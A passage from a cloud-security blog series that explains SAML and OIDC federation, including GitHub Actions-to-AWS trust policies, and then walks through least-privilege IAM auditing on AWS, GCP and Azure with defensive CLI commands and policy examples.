  (Okta, Google, AD FS, Entra ID)       (AWS, Salesforce, GitHub, your app)
         │                                          │
         │  1. User authenticates to IdP             │
         │     (password + MFA)                      │
         │                                          │
         │  2. IdP generates a signed assertion      │
         │     (SAML response or OIDC ID Token)      │
         │ ──────────────────────────────────────── ▶│
         │                                          │
         │  3. SP validates the signature            │
         │     (using IdP's public certificate       │
         │      or JWKS endpoint)                    │
         │  4. SP maps identity to local permissions │
         │  5. SP grants access                      │

The SP never sees the user’s password. It never has one. It trusts the IdP’s cryptographic signature — if the assertion is signed with the IdP’s private key, and the SP trusts that key, the identity is accepted.

This trust chain has one critical property: the security of every SP is bounded by the security of the IdP. Compromise the IdP, and every system that trusts it is compromised. This is why IdP security deserves the same attention as the most sensitive system it gates access to.

SAML 2.0 — The Enterprise Standard

SAML (Security Assertion Markup Language) is XML-based, verbose, and battle-tested. Published in 2005, it’s the protocol behind most enterprise SSO deployments. When your company says “use your corporate login for this vendor app,” SAML is usually the mechanism.

1. User visits AWS console (the Service Provider)
2. AWS checks: no active session → redirect to IdP
   → https://company.okta.com/saml?SAMLRequest=...
3. Okta authenticates the user (password, MFA)
4. Okta generates a SAML Assertion — a signed XML document containing:
   - Who the user is (Subject, typically email)
   - Their attributes (group memberships, custom attributes)
   - When the assertion was issued and when it expires (valid 5-10 minutes typically)
   - Which SP this is for (Audience restriction)
   - Okta's digital signature (RSA-SHA256 or similar)
5. Browser POSTs the assertion to AWS's ACS (Assertion Consumer Service) URL
6. AWS validates the signature against Okta's public cert (retrieved from Okta's metadata URL)
7. AWS reads the SAML attribute for the IAM role
8. AWS calls sts:AssumeRoleWithSAML → issues temporary credentials
9. User gets a console session — no AWS credentials were ever stored anywhere

What a SAML Assertion Actually Looks Like

<saml:Assertion>
  <saml:Issuer>https://okta.company.com</saml:Issuer>

  <saml:Subject>
    <saml:NameID>[email protected]</saml:NameID>
  </saml:Subject>

  <saml:AttributeStatement>
    <!-- This attribute tells AWS which IAM role to assume -->
    <saml:Attribute Name="https://aws.amazon.com/SAML/Attributes/Role">
      <saml:AttributeValue>
        arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider
      </saml:AttributeValue>
    </saml:Attribute>
  </saml:AttributeStatement>

  <!-- Critical: time bounds on this assertion -->
  <saml:Conditions NotBefore="2026-04-11T09:00:00Z" NotOnOrAfter="2026-04-11T09:05:00Z">
    <saml:AudienceRestriction>
      <!-- Critical: this assertion is ONLY valid for AWS -->
      <saml:Audience>https://signin.aws.amazon.com/saml</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>

  <ds:Signature>... RSA-SHA256 signature over the above ...</ds:Signature>
</saml:Assertion>

The Audience restriction and the NotOnOrAfter timestamp are two of the most security-critical fields. The audience ensures this assertion can’t be reused for a different SP. The timestamp ensures it can’t be replayed after expiry.

Setting Up SAML Federation with AWS

# Register Okta as a SAML provider in AWS IAM
aws iam create-saml-provider \
  --saml-metadata-document file://okta-metadata.xml \
  --name OktaProvider

# Create the IAM role that federated users will assume
aws iam create-role \
  --role-name EngineerRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:saml-provider/OktaProvider"
      },
      "Action": "sts:AssumeRoleWithSAML",
      "Condition": {
        "StringEquals": {
          "SAML:aud": "https://signin.aws.amazon.com/saml"
        }
      }
    }]
  }'

# In Okta: configure the AWS IAM Identity Center app
# Attribute mapping: https://aws.amazon.com/SAML/Attributes/Role
# Value: arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider

# Set maximum session duration (8 hours is reasonable for human access)
aws iam update-role \
  --role-name EngineerRole \
  --max-session-duration 28800

SAML Attack Surface

Attack	What It Does	Why It Works	Prevention
XML Signature Wrapping (XSW)	Attacker inserts a malicious assertion, wraps it around the legitimate signed one; some SPs validate the wrong element	SAML’s XML structure is complex; naive signature validation checks the signed element, not the element the SP reads	Use a vetted SAML library — never hand-roll parsing
Assertion replay	Steal a valid assertion (e.g., via network intercept) and replay it before `NotOnOrAfter`	If the SP doesn’t track used assertion IDs, the same assertion can be used multiple times	Short expiry; SP tracks seen assertion IDs
Audience bypass	SP doesn’t verify the `Audience` field	An assertion issued for SP A can be used at SP B	Always validate `Audience` matches your SP entity ID

XML Signature Wrapping is the most interesting attack historically — it was how security researchers demonstrated SAML implementations in AWS, Google, and others could be bypassed before vendors patched their libraries. The lesson: SAML is complex enough that rolling your own parser is asking for a vulnerability.

OpenID Connect (OIDC) — The Modern Protocol

OIDC is JSON-based, REST-native, and designed for the web and API-first world. Built on top of OAuth 2.0, it’s the protocol behind “Sign in with Google,” GitHub’s OIDC tokens for Actions, and workload identity federation across cloud providers.

Token Anatomy

An OIDC ID Token is a JWT — three base64-encoded parts separated by dots:

Header.Payload.Signature

Header:
{
  "alg": "RS256",           ← signing algorithm
  "kid": "key-id-123"       ← which key signed this (for JWKS rotation)
}

Payload (the claims):
{
  "iss": "https://accounts.google.com",         ← who issued this token
  "sub": "108378629573454321234",               ← stable user identifier (not email)
  "aud": "my-app-client-id",                   ← who this token is for
  "exp": 1749600000,                           ← expires at (Unix timestamp)
  "iat": 1749596400,                           ← issued at
  "email": "[email protected]",
  "email_verified": true,
  "hd": "company.com"                          ← hosted domain (Google Workspace)
}

Signature: RSA-SHA256(base64(header) + "." + base64(payload), idp_private_key)

The relying party (your application, or AWS STS) validates the signature using the IdP’s public keys — available at the JWKS endpoint (/.well-known/jwks.json). The signature verification proves the token was issued by the expected IdP and hasn’t been tampered with since.

The Full OIDC Token Exchange (GitHub Actions → AWS)

# GitHub Actions automatically provides an OIDC token in the runner environment
# The token contains: iss=token.actions.githubusercontent.com, repo, ref, sha, run_id, etc.

# Step 1: Fetch the OIDC token from GitHub's token service
TOKEN=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
  "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com" | jq -r '.value')

# Step 2: Present to AWS STS for exchange
aws sts assume-role-with-web-identity \
  --role-arn arn:aws:iam::123456789012:role/GitHubActionsRole \
  --role-session-name github-deploy \
  --web-identity-token "${TOKEN}"

# STS performs these validations:
# 1. Fetch GitHub's JWKS: https://token.actions.githubusercontent.com/.well-known/jwks
# 2. Verify signature is valid
# 3. Verify iss = "token.actions.githubusercontent.com" (matches OIDC provider)
# 4. Verify aud = "sts.amazonaws.com"
# 5. Verify sub matches the trust policy condition
# 6. Verify exp is in the future

The trust policy condition on the IAM role is what prevents any GitHub repository from assuming this role:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
        "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:ref:refs/heads/main"
      }
    }
  }]
}

The sub condition is the security boundary. repo:my-org/my-repo:ref:refs/heads/main means: only runs triggered from the main branch of my-org/my-repo can assume this role. A pull request from a fork, a run from a different repo, or a run from a different branch — all get a different sub claim and the assumption fails.

I’ve reviewed trust policies that omit the sub condition and just check aud. That means any GitHub Actions workflow — in any repository, owned by anyone — can assume that role. That’s not a misconfiguration to be theoretical about: public GitHub repositories exist, and they can trigger GitHub Actions.

OIDC Validation Checklist

Every application that validates OIDC tokens must check all of these:

✓ Signature valid (using IdP's JWKS endpoint — not a hardcoded key)
✓ iss matches the expected IdP URL
✓ aud matches your application's client ID (not just "any audience")
✓ exp is in the future
✓ nbf (not before), if present, is in the past
✓ iat is recent (within your clock skew tolerance)
✓ For workload identity: sub is pinned to the specific workload

Skipping aud validation is the most common mistake. A token issued for application A with aud: app-a-client-id should not be accepted by application B. Without audience validation, any application in your system that can obtain a token for the IdP can reuse it at any other application. Libraries like python-jose and jsonwebtoken validate aud by default — but they need to be configured with the expected audience value.

Enterprise Federation Patterns

Multi-Account AWS with IAM Identity Center + Okta

The pattern I deploy in every multi-account AWS environment:

Okta (IdP)
  └── IAM Identity Center
        ├── Account: prod     → Permission Sets: ReadOnly, DevOps
        ├── Account: staging  → Permission Sets: Developer  
        ├── Account: shared   → Permission Sets: NetworkAdmin, SecurityAudit
        └── Account: sandbox  → Permission Sets: Admin (sandbox only)

# Engineers access accounts through Identity Center portal
aws configure sso
# Prompts: SSO start URL, region, account, role

aws sso login --profile prod-readonly

# List available accounts and roles (useful for tooling and scripts)
aws sso list-accounts --access-token "${TOKEN}"
aws sso list-account-roles --access-token "${TOKEN}" --account-id "${ACCOUNT_ID}"

# Get temporary credentials for a specific account/role
aws sso get-role-credentials \
  --account-id "${ACCOUNT_ID}" \
  --role-name ReadOnly \
  --access-token "${TOKEN}"

When an engineer is offboarded from Okta, they lose access to every AWS account immediately. No individual IAM user deletion across 20 accounts. No access key hunting. One action in Okta, complete revocation.

Just-in-Time (JIT) Provisioning

Rather than creating user accounts in every downstream system ahead of time, JIT provisioning creates accounts on first login:

User authenticates to IdP
SAML/OIDC assertion includes group memberships and attributes
SP receives assertion, checks if a user account exists for this sub
If not: create the account with attributes from the assertion
Grant access based on group claims
On subsequent logins: update the account’s attributes if claims changed

The security property: when a user is disabled in the IdP, their account in downstream systems becomes inaccessible even if the account object still exists. There’s nothing to log in with. JIT accounts don’t survive IdP deletion — they’re inactive shells that produce no risk.

The IdP Is the Trust Anchor — Protect It Accordingly

The entire security of a federated system is bounded by the security of the IdP. If an attacker can log into Okta as an admin, they can issue valid SAML assertions for any user, for any role, to any SP that trusts Okta. Every downstream system is compromised simultaneously.

This is not theoretical. In the 2023 Caesars and MGM Resorts attacks, initial access was achieved through social engineering against identity provider support — not through technical exploitation of cloud infrastructure. Once identity infrastructure is compromised, everything downstream follows.

What this means practically:

MFA for all IdP admin accounts — hardware FIDO2 keys, not TOTP. TOTP codes can be phished in real-time. Hardware keys cannot.
PIM / JIT access for IdP configuration changes — no standing admin access
Separate monitoring and alerting for IdP admin activity
Audit who can modify SAML/OIDC configurations and attribute mappings in the IdP — these are the levers for privilege escalation
Narrow audience restrictions — configure which SPs can receive assertions; don’t create a wildcard IdP configuration that serves all SPs

Conditional Access — Adding Context to Federation

Modern IdPs support Conditional Access policies that restrict when assertions are issued:

// Entra ID Conditional Access: require MFA + compliant device for AWS access
{
  "conditions": {
    "applications": {
      "includeApplications": ["AWS-Application-ID-in-Entra"]
    },
    "users": {
      "includeGroups": ["all-employees"]
    },
    "locations": {
      "excludeLocations": ["NamedLocation-CorporateNetwork"]
    }
  },
  "grantControls": {
    "operator": "AND",
    "builtInControls": ["mfa", "compliantDevice"]
  }
}

This policy: when an employee accesses AWS from outside the corporate network, they must use MFA on a device that MDM has verified as compliant. From inside the network, the policy still applies but the named location exclusion can relax certain requirements.

Conditional Access is how you move beyond “authenticated to IdP” as the only gate. Device health, network location, risk score — these become inputs to the access decision.

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	Federation is the mechanism for extending identity trust across organizational boundaries
CISSP	Domain 3 — Security Architecture	Trust relationships must be explicitly designed; overly broad federation trust is an architectural failure
ISO 27001:2022	5.19 Information security in supplier relationships	Federation with third-party IdPs and SPs establishes a cross-organizational trust boundary that must be governed
ISO 27001:2022	8.5 Secure authentication	SAML and OIDC are the secure authentication protocols for federated access — token validation requirements
ISO 27001:2022	5.17 Authentication information	Credential lifecycle in federated systems — no passwords distributed to SPs; IdP manages authentication
SOC 2	CC6.1	Federated identity is the access control mechanism for human access to cloud environments in CC6.1
SOC 2	CC6.6	Logical access from outside system boundaries — federation with external IdPs and partner organizations

Key Takeaways

Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t need to manage them independently
SAML is XML-based, browser-oriented, widely supported for enterprise SSO; OIDC is JWT-based, API-friendly, the protocol for modern workload identity and consumer SSO
In OIDC, the sub condition in trust policies is what prevents any workload from assuming any role — omitting it is a critical misconfiguration
Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but they need correct configuration
The IdP is the trust anchor — its security posture bounds the security of every system that trusts it. Treat IdP admin access with the same controls as your most sensitive systems.
JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

What’s Next

EP11 brings this into Kubernetes — RBAC, service account tokens, and how the Kubernetes authorization layer interacts with cloud IAM. Two separate systems, both requiring security. A gap in either becomes a gap in both.

Next: Kubernetes RBAC and AWS IAM

Get EP11 in your inbox when it publishes → linuxcent.com/subscribe

AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

May 10, 2026April 18, 2026 by Vamshi Krishna Santhapuri

Reading Time: 10 minutes

TL;DR

The average IAM entity uses less than 5% of its granted permissions — the 95% excess is attack surface, not waste
AWS Access Analyzer generates a least-privilege policy from 90 days of CloudTrail data — use it on every Lambda role, ECS task role, and EC2 instance profile
GCP IAM Recommender surfaces specific right-sizing suggestions based on 90-day activity and tracks them until you act on them
Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
Build aws accessanalyzer validate-policy into CI/CD — catch wildcards and dangerous permissions before they merge
Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

The Big Picture

  THE LEAST PRIVILEGE AUDIT CYCLE

  ┌─────────────────────────────────────────────────────────────────┐
  │  1. INVENTORY  What identities exist, what policies attached?  │
  │  aws iam get-account-authorization-details                      │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  2. CLASSIFY  Group by purpose: human / CI-CD / app / data     │
  │  Expected permission profile per class — deviations are findings│
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  3. FIND UNUSED  Granted vs Used gap (average: 95% excess)     │
  │  AWS: Access Analyzer generated policy + last-accessed data     │
  │  GCP: IAM Recommender  │  Azure: Defender + Access Reviews     │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  4. RIGHT-SIZE  Replace wildcards with scoped permissions       │
  │  Remove unused services · pin resource ARNs · add conditions   │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  5. GUARD  Validate in CI/CD before any policy merges          │
  │  aws accessanalyzer validate-policy → fail pipeline if findings │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  6. MONITOR  Weekly: new findings  Quarterly: full review      │
  │  On offboarding: immediate direct-permission audit             │
  └───────────────────────────┬─────────────────────────────────────┘
                              │
                              └──────────────────── back to 1

The AWS least privilege audit tools covered in this episode map directly onto steps 3–5. The cycle is the practice.

Introduction

An AWS least privilege audit starts by measuring the gap between what each identity is granted and what it actually uses. Then it closes that gap with the tooling AWS, GCP, and Azure all provide natively. The numbers from real environments are consistently worse than teams expect.

Last year I audited an AWS account for an e-commerce company. They’d been running in production for three years. Eight engineers, two teams, a moderately complex microservices architecture. Reasonable people, competent engineers, no obvious security negligence.

When I ran the IAM Access Analyzer policy generation job against their 12 Lambda execution roles and waited for it to pull 90 days of CloudTrail data, here’s what I found:

The average Lambda role had 47 granted permissions. The average Lambda was actually using 6 of them over 90 days. That’s a utilization rate of roughly 13%. The other 87% — the 41 permissions nobody was using — sat there as silent attack surface.

The worst example was a Lambda that processed image thumbnails. Its role had AmazonS3FullAccess plus AmazonDynamoDBFullAccess plus AWSLambdaFullAccess. Someone had attached three AWS managed policies early in development to “make sure everything worked” and never came back to tighten it. The Lambda needed three permissions: s3:GetObject on one bucket, s3:PutObject on another, and logs:CreateLogGroup. That’s it. Instead it had s3:* on all S3, full DynamoDB including delete, and the ability to create and delete other Lambda functions.

If an attacker had exploited a vulnerability in that image processor — a malformed image, a dependency with a CVE — they’d have had full S3 access, full DynamoDB access, and the ability to backdoor other Lambda functions. Not because anyone intended that. Because “make it work first, fix it later” is how IAM configurations drift.

This episode is “fix it later.” The tools exist. The methodology is straightforward. The gap between knowing you should do this and actually doing it is usually not understanding the tooling.

The Fundamental Problem: Granted vs Used

The central insight of IAM auditing is simple: what an identity is granted and what it actually uses are rarely the same thing.

AWS has published data from their own customer environments: the average IAM entity uses less than 5% of the permissions it has been granted. That 95% excess is not wasted. It’s attack surface. Every permission that exists but isn’t needed is a permission an attacker can use if they compromise that identity.

The tools to close this gap exist on all three platforms. The difference between organizations that operate at low IAM risk and those that don’t is usually not knowledge. It’s the discipline of actually running these tools regularly and acting on what they find.

AWS IAM Auditing

Last Accessed Data — The Starting Point

AWS tracks when each service was last called by each IAM entity. This tells you which service permissions have never been used:

# Generate last-accessed data for a specific role
aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:role/LambdaImageProcessor

JOB_ID="..." # returned by the above command

# Poll until complete (usually 30-60 seconds)
aws iam get-service-last-accessed-details --job-id "${JOB_ID}"

# Parse: find services that were never called
aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | select(.TotalAuthenticatedEntities == 0) | .ServiceName'
# These services have never been accessed by this role — permissions can be removed

For finer granularity — which specific actions are used within a service:

aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:policy/AppServerPolicy \
  --granularity ACTION_LEVEL

aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | 
    select(.TotalAuthenticatedEntities > 0) |
    {service: .ServiceName, last_used: .LastAuthenticated}'

Access Analyzer — Generated Least-Privilege Policies

This is the tool I use most. It pulls 90 days of CloudTrail data for a role and generates a policy containing only the actions actually called:

# Start a policy generation job
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/LambdaImageProcessor"
  }' \
  --cloudtrail-details '{
    "trailArn": "arn:aws:cloudtrail:ap-south-1:123456789012:trail/management-events",
    "startTime": "2026-01-01T00:00:00Z",
    "endTime": "2026-04-01T00:00:00Z"
  }'

JOB_ID="..."
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

The output is a valid IAM policy document containing only what was called. Compare it against the current policy — the delta is everything that can be removed. I treat the generated policy as a starting point, not a final answer: occasionally a permission is needed but wasn’t exercised in the 90-day window (error handling paths, quarterly jobs, incident response capabilities). Review the generated policy against the function’s known requirements before applying it verbatim.

Access Analyzer also identifies external sharing you may not have intended:

# Find resources shared outside the account or organization
aws accessanalyzer create-analyzer \
  --analyzer-name account-analyzer \
  --type ACCOUNT

aws accessanalyzer list-findings \
  --analyzer-arn arn:aws:accessanalyzer:ap-south-1:123456789012:analyzer/account-analyzer \
  --filter '{"status":{"eq":["ACTIVE"]}}' \
  --output table
# Shows: S3 buckets, KMS keys, Lambda functions accessible from outside the account

And validates new policies before you apply them:

# Run this in CI/CD before any IAM policy gets merged
aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")'

# Exit non-zero if findings exist — fail the pipeline
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')
[ "$FINDINGS" -eq 0 ] || { echo "IAM policy has $FINDINGS security findings"; exit 1; }

CloudTrail for Targeted Investigation

When you need to understand what a specific role has been doing in detail:

# What API calls has LambdaImageProcessor made in the last 30 days?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=LambdaImageProcessor \
  --start-time "$(date -d '30 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output json | jq '.Events[] | {time:.EventTime, event:.EventName, source:.EventSource}'

# All IAM changes in the last 7 days — track who changed what
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventSource,AttributeValue=iam.amazonaws.com \
  --start-time "$(date -d '7 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output table

Open Source Tooling

For a more comprehensive scan across an account:

# Prowler — runs hundreds of checks including IAM-specific ones
pip install prowler
prowler aws --profile default --services iam --output-formats json html

# Key IAM checks:
# iam_root_mfa_enabled
# iam_user_no_setup_initial_access_key
# iam_policy_no_administrative_privileges
# iam_user_access_key_unused → finds keys unused for 90+ days
# iam_role_cross_account_readonlyaccess_policy

# ScoutSuite — multi-cloud auditor with a report UI
pip install scoutsuite
scout aws --profile default --report-dir ./scout-report

GCP IAM Auditing

IAM Recommender — Automated Right-Sizing

GCP’s IAM Recommender analyses 90 days of activity and surfaces specific suggestions: “replace roles/editor with roles/storage.objectViewer.” It tells you exactly what to change, not just that something needs changing:

# List IAM recommendations for a project
gcloud recommender recommendations list \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --format=json | jq '.[] | {
    principal: .description,
    current_role: .content.operationGroups[].operations[] | select(.action=="remove") | .path,
    suggested_role: .content.operationGroups[].operations[] | select(.action=="add") | .value
  }'

# Mark a recommendation as applied (required to track progress)
gcloud recommender recommendations mark-succeeded RECOMMENDATION_ID \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --etag ETAG

In practice, I run IAM Recommender across all GCP projects in a quarterly review. The recommendations don’t age out — GCP continues to track them until you address them or explicitly dismiss them. Dismissed without action counts as a decision; it should be documented.

Policy Analyzer — Answering Access Questions

When you need to understand who has access to a specific resource, and why:

# Who can access a specific BigQuery dataset?
gcloud policy-intelligence analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//bigquery.googleapis.com/projects/my-project/datasets/customer_analytics" \
  --output-partial-result-before-timeout

# What can a specific principal do in this project?
gcloud policy-intelligence analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//cloudresourcemanager.googleapis.com/projects/my-project" \
  --identity="serviceAccount:[email protected]"

Finding Public Exposure

# Org-wide scan for allUsers or allAuthenticatedUsers bindings
gcloud asset search-all-iam-policies \
  --scope=organizations/ORG_ID \
  --query="policy.members:allUsers OR policy.members:allAuthenticatedUsers" \
  --format=json | jq '.[] | {resource: .resource, policy: .policy}'

Run this in every new environment you inherit. The results reliably surface data exposure incidents waiting to happen — public GCS buckets, publicly readable BigQuery datasets, APIs exposed to any authenticated Google account.

Azure IAM Auditing

Defender for Cloud — Baseline Recommendations

# Get IAM-related security recommendations
az security assessment list --output table | grep -i -E "(identity|mfa|privileged|owner)"

# Check specific conditions:
# "MFA should be enabled on accounts with owner permissions on your subscription"
# "Deprecated accounts should be removed from your subscription"
# "External accounts with owner permissions should be removed from your subscription"

Azure Resource Graph — Bulk Role Assignment Queries

Azure Resource Graph lets you query RBAC assignments across the entire tenant in a single call — essential for large Azure estates:

# All role assignments — who has what, where
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| extend principalId = properties.principalId,
         roleId = properties.roleDefinitionId,
         scope = properties.scope
| project scope, principalId, roleId
| limit 500" \
--output table

# Find all Owner assignments at subscription scope — high-risk
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| where properties.roleDefinitionId endswith '8e3af657-a8ff-443c-a75c-2fe8c4bcb635'
| where properties.scope startswith '/subscriptions/'
| project scope, properties.principalId" \
--output table

Entra ID Access Reviews — Automated Re-Certification

Access reviews send notifications to resource owners or users asking them to confirm that access is still appropriate. When someone doesn’t respond — or responds “no” — the access is removed:

# Create a quarterly access review for subscription Owner assignments
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/identityGovernance/accessReviews/definitions" \
  --body '{
    "displayName": "Quarterly Subscription Owner Review",
    "scope": {
      "query": "/subscriptions/SUB_ID/providers/Microsoft.Authorization/roleAssignments",
      "queryType": "MicrosoftGraph"
    },
    "reviewers": [{"query": "/me", "queryType": "MicrosoftGraph"}],
    "settings": {
      "mailNotificationsEnabled": true,
      "justificationRequiredOnApproval": true,
      "autoApplyDecisionsEnabled": true,
      "defaultDecision": "Deny",          ← if no response, access is removed
      "instanceDurationInDays": 7,
      "recurrence": {
        "pattern": {"type": "absoluteMonthly", "interval": 3},
        "range": {"type": "noEnd"}
      }
    }
  }'

The defaultDecision: Deny setting is the key. Access reviews that default to preserving access on non-response don’t actually remove anything. They just document that nobody reviewed it. Defaulting to revocation means inaction removes access, which is the correct behavior for privileged roles.

The Hardening Workflow

The methodology I apply when auditing any cloud IAM configuration:

Step 1: Inventory Everything

You cannot audit what you don’t know exists.

# AWS: full IAM snapshot in one call
aws iam get-account-authorization-details --output json > iam-snapshot-$(date +%Y%m%d).json
# Contains: all users, groups, roles, policies, attachments — everything

# GCP: export all IAM-relevant assets
gcloud asset export \
  --project=my-project \
  --output-path=gs://audit-bucket/iam-snapshot-$(date +%Y%m%d).json \
  --asset-types="iam.googleapis.com/ServiceAccount,cloudresourcemanager.googleapis.com/Project"

Step 2: Classify by Function

Group identities by purpose: human engineering access, CI/CD pipelines, application workloads, data pipelines, monitoring/audit. Each class has an expected permission profile. Anything outside the expected profile for its class is a finding.

A Lambda function with iam:* is not in the expected profile for application workloads. An EC2 instance role with s3:DeleteObject on * deserves a question. A CI/CD pipeline role with secretsmanager:GetSecretValue warrants understanding what secrets it actually needs.

Step 3: Find Unused Permissions

Apply the tools:
– AWS: Access Analyzer generated policies + Last Accessed Data
– GCP: IAM Recommender
– Azure: Defender for Cloud recommendations + sign-in activity analysis

For any permission unused in 90 days: document whether it’s still needed (rare operation, incident response capability) or can be removed.

Step 4: Right-Size Policies

Replace broad permissions with specific ones:

// Before: attached AmazonS3FullAccess to a read-only service
{
  "Action": "s3:*",
  "Effect": "Allow",
  "Resource": "*"
}

// After: only what the service actually calls
{
  "Action": ["s3:GetObject", "s3:ListBucket"],
  "Effect": "Allow",
  "Resource": [
    "arn:aws:s3:::app-assets-prod",
    "arn:aws:s3:::app-assets-prod/*"
  ]
}

Every wildcard you remove is attack surface eliminated. Not conceptually — concretely.

Step 5: Add Conditions as Guardrails

Conditions constrain how permissions are used even when they can’t be removed:

// Require MFA for sensitive operations — applies across all roles in the account
{
  "Effect": "Deny",
  "Action": ["iam:*", "s3:Delete*", "ec2:Terminate*", "kms:*"],
  "Resource": "*",
  "Condition": {
    "BoolIfExists": { "aws:MultiFactorAuthPresent": "false" }
  }
}

// Restrict all non-service API calls to the corporate network
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "NotIpAddress": { "aws:SourceIp": ["10.0.0.0/8", "172.16.0.0/12"] },
    "Bool": { "aws:ViaAWSService": "false" }   // allow calls made through AWS services (e.g., Lambda calling S3)
  }
}

Step 6: Build It Into CI/CD

IAM configuration changes that aren’t reviewed before they reach production will drift. Make the validation automatic:

# Pre-merge check in CI — catches wildcards and dangerous permissions before they land
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://changed-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')

if [ "$FINDINGS" -gt 0 ]; then
  echo "❌ IAM policy has $FINDINGS security findings — see below"
  aws accessanalyzer validate-policy --policy-document file://changed-policy.json \
    --policy-type IDENTITY_POLICY | jq '.findings[]'
  exit 1
fi

Step 7: Schedule Regular Reviews

IAM audit is not a one-time project. Build a cadence:

Weekly: Access Analyzer findings, IAM Recommender dismissals, new cross-account trust relationships
Monthly: Unused access keys report, inactive service accounts
Quarterly: Access reviews for privileged roles, full policy inventory review
On offboarding: Immediate review of departing engineer’s direct permissions and any roles whose trust policies name them

Quick Wins Checklist

Check	AWS	GCP	Azure
No active root / global admin credentials	`GetAccountSummary` → `AccountAccessKeysPresent: 0`	N/A	Check Entra ID conditional access
MFA on all human privileged accounts	IAM Credential report	Google 2FA enforcement	Conditional Access policy
No inactive credentials older than 90 days	Credential report `LastRotated`	SA key age	Entra ID sign-in activity
No policies with `Action:` or `Resource:` on write	Access Analyzer validate	N/A	Azure Policy
No public-facing storage	S3 Block Public Access	`constraints/storage.publicAccessPrevention`	Storage account public access disabled
Machine identities use roles, not static keys	Audit for access key creation on roles	`iam.disableServiceAccountKeyCreation`	Use Managed Identity
Permissions verified against actual usage	Access Analyzer generated policy	IAM Recommender	Defender for Cloud recommendations

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 6 — Security Assessment and Testing	IAM auditing is a core cloud security assessment activity — finding over-permission before attackers do
CISSP	Domain 7 — Security Operations	Continuous IAM right-sizing is an operational discipline requiring tooling, cadence, and ownership
ISO 27001:2022	5.18 Access rights	Periodic review of access rights — this episode is the practical implementation of that control
ISO 27001:2022	8.2 Privileged access rights	Reviewing and right-sizing elevated permissions; detecting unused privileged access
ISO 27001:2022	8.16 Monitoring activities	Continuous IAM monitoring, CloudTrail analysis, and automated anomaly detection
SOC 2	CC6.3	Access removal processes — Access Analyzer, IAM Recommender, and Access Reviews are the tooling for CC6.3
SOC 2	CC7.1	Threat and vulnerability identification — unused permissions are latent attack surface, identifiable and removable

Key Takeaways

The average cloud identity uses less than 5% of its granted permissions — the 95% excess is attack surface, not just waste
AWS Access Analyzer generates a least-privilege policy from CloudTrail data — run it on every Lambda role, ECS task role, and EC2 instance profile quarterly
GCP IAM Recommender surfaces role right-sizing suggestions based on 90-day activity — they don’t expire until you address them
Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
Build IAM policy validation into CI/CD — catch wildcards and dangerous permissions before they merge
Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

What’s Next

